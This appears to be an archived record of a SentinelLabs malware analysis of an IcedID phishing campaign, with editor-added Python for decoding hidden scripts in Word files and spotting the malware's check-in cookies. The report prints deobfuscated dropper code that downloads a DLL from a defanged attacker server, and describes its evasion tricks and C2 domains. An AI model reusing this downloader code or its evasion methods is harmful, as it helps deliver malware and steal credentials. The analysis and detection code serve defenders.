{
	"id": "b4d99f8a-ebd3-4989-8cae-1a68fb355579",
	"created_at": "2026-04-10T03:21:08.688377Z",
	"updated_at": "2026-04-10T13:12:06.950754Z",
	"deleted_at": null,
	"sha1_hash": "1133a402034b4a9d4409cba7d3c1ce950b58a65b",
	"title": "Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10519405,
	"plain_text": "Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth\r\nwith Benign Macros - SentinelLabs\r\nBy Marco Figueroa\r\nPublished: 2021-06-24 · Archived: 2026-04-10 03:11:36 UTC\r\nExecutive Summary\r\nSentinelLabs has uncovered a recent IcedID campaign and analyzed nearly 500 artifacts associated with\r\nthe attacks.\r\nIcedID Office macro documents use multiple techniques in an attempt to bypass detection.\r\nTo further obfuscate the attack, data embedded in the document itself is used by the malicious macro.\r\nAnalyzing only the macro provides an incomplete view of the attack.\r\nThe HTA dropper embedded in the document is obfuscated JavaScript, which executes in memory and\r\nutilizes additional techniques to evade AV/EDR.\r\nOverview\r\nMany security researchers thought that IcedID would be the successor to Emotet after the coordinated takedown\r\nof Emotet malware in early 2021 by law enforcement agencies. IcedID (aka BokBot) was designed as a banking\r\ntrojan targeting victims’ financial information and acting as a dropper for other malware. Initially discovered in\r\n2017, IcedID has become a prominent component in financially-driven cybercrime. The malware is primarily\r\nspread via phishing emails typically containing Office file attachments. The files are embedded with malicious\r\nmacros that launch the infection routine, which retrieves and runs the payload.\r\nIn May 2021, SentinelLabs observed a new campaign delivering IcedID through widespread phishing emails laced\r\nwith poisoned MS Word attachments that use a simple but effective technique to avoid suspicion. This ongoing\r\nIcedID campaign attempts to gain a foothold on the victim’s machine through a crafted Word doc in which the\r\nembedded macro itself does not contain any malicious code.\r\nJust like a genuine macro, the IcedID macro operates on the content of the document itself. In this case, that\r\ncontent includes obfuscated JavaScript code. 
This simple technique helps to evade many automated static and\r\ndynamic analysis engines, because the content only becomes malicious when it is executed through an MS\r\nOffice engine.\r\nThe obfuscated JavaScript is responsible for dropping a Microsoft HTML Application (HTA) file to\r\nC:\\Users\\Public. The macro then launches the HTA with mshta.exe, the Windows HTML Application host built on\r\nInternet Explorer's engine. This second stage reaches out to the attacker's C2 and downloads a DLL with a .jpg\r\nextension into the same Public folder. The HTA then calls rundll32 to execute this payload, which collects and\r\nexfiltrates user data to the attacker's C2.\r\nBelow we present further technical details of this recent campaign from examination of almost 500 artifacts.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 1 of 11\n\nTechnical Analysis\r\nThe IcedID phishing email contains what looks like an innocuous enough Word attachment. As expected with\r\nthese kinds of malware operations, opening the document prompts the user to enable editing and then ‘Enable\r\ncontent’.\r\nTargets are prompted to enable macros when opening the maldoc\r\nWhat is unexpected is that the macro itself is uninteresting.\r\nThe VBA macros contained in the document\r\nIn this case, the malicious code is stored in the document body itself: JavaScript written backwards and then\r\nbase64-encoded, so none of the script's keywords appear in the macro or in the readable document text.\r\nObfuscated code in the document.xml\r\nThe MS Word macro writes this code out as an HTA file to C:\\Users\\Public. Any user can write there, so the drop\r\nalways succeeds, but arguably this is an operational mistake on the attacker's side, since this folder is a\r\nlocation generally monitored by security products.\r\nThe HTA code is executed by the macro using the GetObject() and Navigate() functions. 
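\r\nThe payload hidden in document.xml can be recovered without opening the document in Word at all: unzip the .docx, strip the XML tags from the text runs, base64-decode every long run of base64 characters and reverse the result. The script below does that as an added example; it is the editor's code, not the campaign's document or SentinelLabs tooling, and the sample script, decoy text and in-memory .docx it builds are constructed stand-ins (the real HTA source contains quotes and backslashes that are deliberately left out of the stand-in):\r\n
```python
import base64
import io
import re
import zipfile

# Editor's added example; not the campaign's document or SentinelLabs tooling.
# The script below is a constructed stand-in for the HTA source, written
# without quotes or backslashes so it stays a plain identifier-only snippet.
SAMPLE_SCRIPT = ('var req = new ActiveXObject(cls); req.open(method, url, false); '
                 'req.send(); if (req.status == 200) { stream.savetofile(path, 2); }')

DECOY_TEXT = 'Invoice 4471 is overdue. Enable editing and content to view the details.'

# Long runs of base64 alphabet characters; 40 is an arbitrary floor that skips
# ordinary words and short identifiers.
B64_RUN = re.compile('[A-Za-z0-9+/]{40,}={0,2}')
XML_TAG = re.compile('<[^>]+>')
# Strings a dropper of this kind can hardly avoid; matched case-insensitively.
SCRIPT_MARKERS = ('activexobject', 'msxml2', 'adodb.stream', 'savetofile', 'wscript.shell')


def encode_payload(script):
    # The obfuscation the report describes: reverse the script, then base64 it.
    return base64.b64encode(script[::-1].encode('latin-1')).decode('ascii')


def build_sample_docx(payload_b64):
    # Minimal .docx: a zip whose word/document.xml holds a decoy paragraph and
    # the encoded payload as document text. Namespace declarations are omitted
    # because the scanner only looks at text runs, never at the XML structure.
    doc_xml = ('<w:document><w:body>'
               '<w:p><w:r><w:t>' + DECOY_TEXT + '</w:t></w:r></w:p>'
               '<w:p><w:r><w:t>' + payload_b64 + '</w:t></w:r></w:p>'
               '</w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, 'w', zipfile.ZIP_DEFLATED) as zf:
        zf.writestr('word/document.xml', doc_xml)
    return buf.getvalue()


def decode_reversed_b64(blob):
    # Undo the encoding in the opposite order: base64-decode, then reverse.
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    return raw.decode('latin-1')[::-1]


def extract_hidden_scripts(docx_bytes):
    # Return every decoded blob that looks like script, from any XML part under
    # word/ (the campaign used document.xml, but a decoder should not assume it).
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith('word/') and name.endswith('.xml')):
                continue
            # Replace tags with a space so adjacent text runs cannot fuse into
            # one false base64 run.
            text = XML_TAG.sub(' ', zf.read(name).decode('utf-8', 'replace'))
            for blob in B64_RUN.findall(text):
                decoded = decode_reversed_b64(blob)
                if decoded and any(m in decoded.lower() for m in SCRIPT_MARKERS):
                    found.append(decoded)
    return found


if __name__ == '__main__':
    sample = build_sample_docx(encode_payload(SAMPLE_SCRIPT))
    for script in extract_hidden_scripts(sample):
        print(script)
```
\r\nPoint extract_hidden_scripts() at a real attachment's bytes to try it on a suspected maldoc; the marker list is the part to tune, since a payload that reaches the network through something other than XMLHTTP or ADODB.Stream will not trip it.\r\n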
This GetObject()/Navigate() pattern is a\r\n“VB Legacy” technique that conforms to how older Office macro files behave.\r\nPart of the VBA code embodied in the Word Document\r\nOnce the HTA code is running, it deobfuscates the JavaScript code in memory and utilizes two additional\r\ntechniques in an attempt to evade AV/EDR security controls:\r\nThe HTA instantiates the MSScriptControl.ScriptControl COM component and uses it to evaluate the\r\ndeobfuscated JavaScript at runtime.\r\nThe code calls JavaScript functions from VBScript code within the HTA. Crossing between the two script\r\nengines also confuses code and activity tracking in certain endpoint security products.\r\nHTA file dropped in the Public folder\r\nBelow is the deobfuscated and ‘beautified’ version of the code from the HTA file.\r\nvar memoryVb = new ActiveXObject(\"msxml2.xmlhttp\");\r\n// open() takes the method and URL; the report's listing is cut off after the URL\r\nmemoryVb.open(\"GET\", \"hxxp[:]//awkwardmanagement2013z[.]com/adda/hMbq4kHp63r/qv2KrtCyxsQZG2qnnjAyyS2T…\");\r\nmemoryVb.send();\r\nif (memoryVb.status == 200) {\r\n  try {\r\n    // ADODB.Stream in binary mode (type 1) writes the response body to disk;\r\n    // open and close are invoked without parentheses, as in the sample\r\n    var rightClass = new ActiveXObject(\"adodb.stream\");\r\n    rightClass.open;\r\n    rightClass.type = 1;\r\n    rightClass.write(memoryVb.responsebody);\r\n    // 2 = adSaveCreateOverWrite; the DLL is saved with a .jpg extension\r\n    rightClass.savetofile(\"c:\\\\users\\\\public\\\\sizeTempStruct.jpg\", 2);\r\n    rightClass.close;\r\n  } catch (e) {}\r\n}\r\nThe code creates an MSXML2.XMLHTTP object and calls open() with the HTTP method and URL (open() also\r\naccepts optional asynchronous-mode and credential arguments, but the listing is cut off before them). If the URL\r\nresponds with a status code of 200, the response body is written to disk through an ADODB.Stream as a file with a\r\n“.jpg” extension. Unsurprisingly, the file is not what it pretends to be.\r\nLooking at related domains by the same actor shows the breadth of activity. When tracking this campaign, the\r\ndomain mappingmorrage[.]top had numerous duplicates of the “.jpg” file and the second stage binary associated\r\nwith this campaign. 
Multiple file names are used, such as “sizeQuery.jpg”, “sizeTempStruct.jpg”,\r\n“tmpSizeLocal.jpg” and so on.\r\nIcedID related files on VirusTotal\r\nIcedID JPG/DLL\r\nChanging file extensions is a common, if unsophisticated, technique aimed at evasion. In this case, the “.jpg” file\r\nis actually a DLL. Analysis of the file's exports reveals the DLLRegisterServer function, an obvious\r\ncandidate for the initial installer of the IcedID malware and the export to hand to rundll32.\r\nPE Studio\r\nTo unpack this binary, we can load rundll32.exe in x64dbg and use the command line option to specify the\r\nexported function in sizeTeamStruct.dll, as shown in the screenshot below.\r\nLoading rundll32 + DLL with the exported function\r\nTo get to the unpacked binary, we add a breakpoint on VirtualAlloc and run until\r\nthe breakpoint is hit. 
Among the VirtualAlloc hits, we look for the call that allocates the region the unpacked code is written into,\r\nand dump the binary from that address once the unpacker has filled it in.\r\nUnpacked IcedID\r\nLooking at the dumped binary in PE Studio, the imports that stand out are WinHttpOpenRequest,\r\nWinHttpSendRequest, and WinHttpReceiveResponse.\r\nWinHttpOpenRequest creates an HTTP request handle and stores the specified parameters in that handle,\r\nWinHttpSendRequest sends the request to the C2 server, and WinHttpReceiveResponse waits\r\nfor the response.\r\nPE Studio with the unpacked IcedID\r\nAfter loading the binary into x64dbg, we add a breakpoint on WinHttpOpenRequest. When this breakpoint is\r\nhit, the disassembly shows the code building the domain through an XOR operation. This\r\nhelps us to understand how the C2 value is generated.\r\nChecking aws.amazon.com connectivity\r\nSome of the domains collected from our analysis of around 500 samples of IcedID included:\r\nepicprotovir[.]download\r\nessoandmobilcards[.]com\r\nimmotransfer[.]top\r\nkickersflyers[.]bid\r\nmappingmorrage[.]top\r\nmomenturede[.]fun\r\nprovokordino[.]space\r\nquadrogorrila[.]casa\r\nvaclicinni[.]xyz\r\nvikolifer[.]top\r\nThese resolve to Cloudflare addresses, which mask the origin servers. 
For example,\r\nhxxp[://]mappingmorrage[.]top/\r\n172.67.196.74\r\n104.21.57.254\r\n2606:4700:3037::6815:39fe\r\n2606:4700:3037::ac43:c44a\r\nThe malware's main module steals credentials from the victim's machine and exfiltrates them\r\nto the C2 server.\r\nThe initial check-in sends a cookie describing the infected host to the C2: Windows version, CPU information,\r\nusername, computer name, domain and network adapter, giving the operators a good understanding of the\r\ncompromised environment.\r\n__gads:\r\n_gat: Windows version info (6.3.9600.64 is Windows 8.1, 64-bit)\r\n_ga: Processor CPUID information\r\n_u: Username and computer name (DESKTOP-FRH1VBHMarcoFB35A6FF06678D37)\r\n__io: Domain id\r\n_gid: NIC\r\nIcedID exfiltrates environmental data via a cookie\r\nNetwork traffic carrying this cookie set is an indication that the host has been infected with\r\nIcedID malware. Note that _ga, _gid, _gat and __gads on their own are ordinary Google analytics and advertising\r\ncookie names, presumably chosen so the request blends in; the combination with _u and __io is what makes the\r\nrequest distinctive.\r\nConclusion\r\nMany IcedID attacks begin with a phishing email and users opening the attachment. In this campaign, IcedID uses\r\na maldoc in the initial infection stage in an attempt to bypass defenses by interacting with the contents of the\r\ndocument itself. Launching an HTA through mshta.exe from an Office process is unusual enough that defenders\r\ncan monitor for it in their environments. This, along with other techniques such as changing the file\r\nextension and the behavior of the DLL, should be detected by a capable Next Gen security solution.\r\nIndicators of Compromise\r\nhttps://github.com/SentineLabs/icedID\r\nSource: https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/",
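	"editor_examples": "Added example for the cookie-based check-in described in plain_text above. This is the editor's code, not SentinelLabs tooling or the malware's own, and its log lines and cookie values are constructed placeholders; only the six cookie names and their meanings come from the report. It parses Cookie request headers out of proxy-style log lines, requires the full IcedID name set before raising a verdict, and maps each field to what the report says it carries:\r\n
```python
# Editor's added example; the log lines are constructed and the cookie values
# are placeholders, not captured IcedID traffic. Cookie names follow the report.
ICEDID_COOKIE_NAMES = frozenset(['__gads', '_gat', '_ga', '_u', '__io', '_gid'])
# Four of those names are ordinary Google analytics/advertising cookies, so on
# their own they prove nothing.
GA_COOKIE_NAMES = frozenset(['_ga', '_gid', '_gat', '__gads'])

# What each field carries according to the report (used for triage output).
FIELD_MEANING = {
    '_gat': 'windows version',
    '_ga': 'cpu id',
    '_u': 'username and computer name',
    '__io': 'domain id',
    '_gid': 'nic',
    '__gads': 'unspecified',
}

SAMPLE_LOG = [
    # timestamp src method url Cookie: <header value>   (constructed)
    '2021-06-01T10:00:01Z 10.0.0.5 GET http://mappingmorrage.top/ Cookie: __gads=0001; _gat=0002; _ga=0003; _u=0004; __io=0005; _gid=0006',
    '2021-06-01T10:00:02Z 10.0.0.7 GET https://news.example/ Cookie: _ga=GA1.2.111; _gid=GA1.2.222; _gat=1',
    '2021-06-01T10:00:03Z 10.0.0.9 GET https://shop.example/cart Cookie: session=abc; _ga=GA1.2.333',
    '2021-06-01T10:00:04Z 10.0.0.5 POST http://mappingmorrage.top/ Cookie: _u=0004; __io=0005',
    '2021-06-01T10:00:05Z 10.0.0.11 GET https://intranet.example/ -',
]


def parse_cookie_header(value):
    # Split a Cookie request header into a name -> value dict. Values are kept
    # verbatim; the report does not document their encoding.
    cookies = {}
    for part in value.split(';'):
        name, sep, val = part.strip().partition('=')
        if sep and name:
            cookies[name] = val
    return cookies


def classify_cookie(cookie_header):
    names = set(parse_cookie_header(cookie_header))
    hits = names & ICEDID_COOKIE_NAMES
    if hits == ICEDID_COOKIE_NAMES:
        return 'icedid'
    if hits and hits <= GA_COOKIE_NAMES:
        return 'benign-analytics'
    if hits:
        # _u or __io without the full set: worth a look, not a firm verdict
        return 'partial'
    return 'none'


def describe_checkin(cookie_header):
    # Map the fields present to their meaning so an analyst sees what leaked.
    cookies = parse_cookie_header(cookie_header)
    return {FIELD_MEANING[n]: cookies[n] for n in ICEDID_COOKIE_NAMES if n in cookies}


def scan_log(lines):
    # Return (source ip, url, verdict) for every line worth escalating.
    flagged = []
    marker = ' Cookie: '
    for line in lines:
        if marker not in line:
            continue
        head, _, cookie_header = line.partition(marker)
        fields = head.split()
        verdict = classify_cookie(cookie_header)
        if verdict in ('icedid', 'partial'):
            flagged.append((fields[1], fields[3], verdict))
    return flagged


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```
\r\nThe full six-name set is the signal; a rule that fires on _ga, _gid or _gat alone will page on every analytics-enabled website the user visits. The partial verdict exists so that _u and __io, which have no benign counterpart in the report, are still surfaced for review.",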
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/"
	],
	"report_names": [
		"evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros"
	],
	"threat_actors": [],
	"ts_created_at": 1775791268,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1133a402034b4a9d4409cba7d3c1ce950b58a65b.pdf",
		"text": "https://archive.orkl.eu/1133a402034b4a9d4409cba7d3c1ce950b58a65b.txt",
		"img": "https://archive.orkl.eu/1133a402034b4a9d4409cba7d3c1ce950b58a65b.jpg"
	}
}